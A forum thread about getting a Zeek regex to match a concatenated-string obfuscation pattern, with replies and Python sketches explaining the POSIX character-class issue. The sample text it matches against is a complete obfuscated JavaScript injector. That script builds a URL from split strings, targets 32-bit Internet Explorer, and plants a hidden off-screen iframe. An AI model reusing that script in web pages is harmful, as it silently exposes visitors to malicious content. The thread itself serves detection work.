Problems with Zeek regex - same pattern working on RegExr

Hi,

I've been trying to get a regex to work with Zeek for a couple of days. I am trying to extract the following string:

yDGNWQPxJVs='http:/'+'/bitmp'+'3searc'+'h.in/o'+'5p9hd_'+'j/Zl2A'+'h0B35_'+'D5FfDH'+'INcy';

From the following block of text:

jigsr='navigator';coon3='document';tiltu=window;prod8=tiltu[coon3];tensg=tiltu[jigsr];var wnd=window;yDGNWQPxJVs='http:/'+'/bitmp'+'3searc'+'h.in/o'+'5p9hd_'+'j/Zl2A'+'h0B35_'+'D5FfDH'+'INcy';var doc=wnd.document;OEkQahbGTK=yDGNWQPxJVs;function setCookie(name,value,expires){doc.cookie=name+'='+escape(value)+"; expires="+expires.toGMTString()+"; path=/";return;}function getCookie(name){var cookie=' '+doc.cookie;var search=' '+name+'=';var setStr=null;var offset = 0;var end = 0;if (cookie.length > 0) {offset = cookie.indexOf(search);if (offset != -1) {offset += search.length;end = cookie.indexOf(';', offset);if (end == -1) {end = cookie.length;}setStr = wnd.unescape(cookie.substring(offset, end));}}return setStr;}function UslhyuLiAkJ(){if(!getCookie("BFQPubsjgY")){var expires=new Date();expires.setTime(expires.getTime()+0x5265c00);setCookie("BFQPubsjgY",'6efa5b267ee02fc3e86fc6422fd62e2b',expires);return true}else{return false}}function AjheiSHvrOq(j7r){var w9,f5h,av,l1;l1='onload';av='addEventListener';f5h='attachEvent';w9='DOMContentLoaded';prod8[av]?prod8av:windowf5h}function jWpkbYMLKS(){var qy;qy='userAgent';return tensg[qy]}function RTANcyPJq(y0l,np1){var p7;p7='test';return y0lp7}function hDGVdQzyACP(){var fq;fq=jWpkbYMLKS();return RTANcyPJq(/Win64;/i,fq)||RTANcyPJq(/x64;/i,fq)}function XxIbmUNTRD(){var ai,be;be=(/Trident/i);ai=jWpkbYMLKS();if(!RTANcyPJq(be,ai)){return 0}else{return true}}function YSUTWLtuoX(){var jq6,u0u,l2,hn,r7c,qt7,y1,nmv,fa,bv,ag,cun,zu5,pqe;bv='posi'+'tion:absolut'+'e;left:-15'+'23px;t'+'op:-153'+'7px';nmv='src';y1='iframe';u0u='cssText';l2='getElementsByTagName';cun='body';qt7='width';fa='height';pqe='appendChild';hn='createElement';r7c='style';ag='10';if(UslhyuLiAkJ()&&XxIbmUNTRD()&&!hDGVdQzyACP()){jq6=ag;zu5=prod8hn;zu5[qt7]=jq6;zu5[fa]=jq6;zu5[r7c][u0u]=bv;zu5[nmv]=OEkQahbGTK;prod8l2[0]pqe}}AjheiSHvrOq(YSUTWLtuoX);

On https://regexr.com/ I use the regex:

[\d\w]+[\s]*=[\s]*(('([:/._-]|[\d\w]|[\s])+')+([\s]|\+)+)+('([:/._-]|[\d\w]|[\s])+')+;?

This correctly identifies the string. I’m now trying to get the same pattern to work in Zeek, so I converted the syntax as follows:

local concat = find_all(data, /[:alnum:]+[:space:]*=[:space:]*(('([:/._-]|[:alnum:]|[:space:])+')+([:space:]|\+)+)+('([:/._-]|[:alnum:]|[:space:])+')+;?/i);

Unfortunately, this is not matching and I can’t understand why not. Logically, it is exactly the same as the regex pattern I’ve tested on RegExr.

It’s a long shot but if anyone can spot what I’m doing wrong, please let me know :blush:

Thanks,

Jonah

Hi,

I fixed this: for some reason, [:alnum:] is not treated the same as [a-z0-9].

Thanks,

Jonah
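
A possible explanation for the difference, offered as an assumption rather than a confirmed diagnosis of Zeek's parser: in POSIX-style syntax, a class name such as [:alnum:] only has its special meaning inside an outer bracket expression, written [[:alnum:]]. With a single pair of brackets, an engine may read it as a plain set of the characters ':', 'a', 'l', 'n', 'u' and 'm'. The sketch below uses Python's re module (not Zeek's engine, and with no POSIX class support at all) purely to illustrate that reading.

```python
import re

# Assumption for illustration: the engine treats "[:alnum:]" as an ordinary
# character set. Python's re does exactly this, since it has no POSIX classes.
bare_class = re.compile(r"[:alnum:]+")
explicit = re.compile(r"[a-zA-Z0-9]+")

name = "yDGNWQPxJVs"  # the variable name from the script in this thread

# None of the characters in the name are in the set {':', 'a', 'l', 'n', 'u', 'm'}.
bare_match = bare_class.fullmatch(name)
explicit_match = explicit.fullmatch(name)

# The bare form happily matches text made only of those literal characters.
literal_hits = bare_class.findall("manual:123")

print(bare_match)
print(explicit_match.group(0))
print(literal_hits)
```

If the same reading applies in Zeek, it would be consistent with the explicit range working where the single-bracket class name did not.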

Odd. [:alnum:] calls the C isalnum() function underneath, which should match [a-zA-Z0-9]. Can you write up a GitHub issue for it with a simple test case?

Tim
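
As a starting point for the simple test case requested above, here is a minimal cross-check of the working variant, assuming explicit ranges in place of the class names as described in the fix. It is written for Python's re module rather than Zeek, so it confirms only the logic of the pattern, not Zeek's handling of it. The `data` string is a shortened excerpt of the script from the first post, and the names `QUOTED` and `CONCAT` are made up for this sketch.

```python
import re

# Shortened excerpt of the obfuscated script, using straight quotes.
data = (
    "var wnd=window;"
    "yDGNWQPxJVs='http:/'+'/bitmp'+'3searc'+'h.in/o'+'5p9hd_'"
    "+'j/Zl2A'+'h0B35_'+'D5FfDH'+'INcy';"
    "var doc=wnd.document;OEkQahbGTK=yDGNWQPxJVs;"
)

# One single-quoted fragment: letters, digits, whitespace and : / . _ -
QUOTED = r"'[a-z0-9:/._\s-]+'"

# name = 'frag' + 'frag' + ... + 'frag' with an optional trailing semicolon.
# Explicit ranges plus IGNORECASE stand in for the alnum class.
CONCAT = re.compile(
    rf"[a-z0-9]+\s*=\s*(?:{QUOTED}\s*\+\s*)+{QUOTED};?",
    re.IGNORECASE,
)

matches = CONCAT.findall(data)
for m in matches:
    print(m)
```

Only the concatenated assignment should be reported; plain assignments such as `wnd=window` are skipped because the pattern requires at least two quoted fragments joined by `+`.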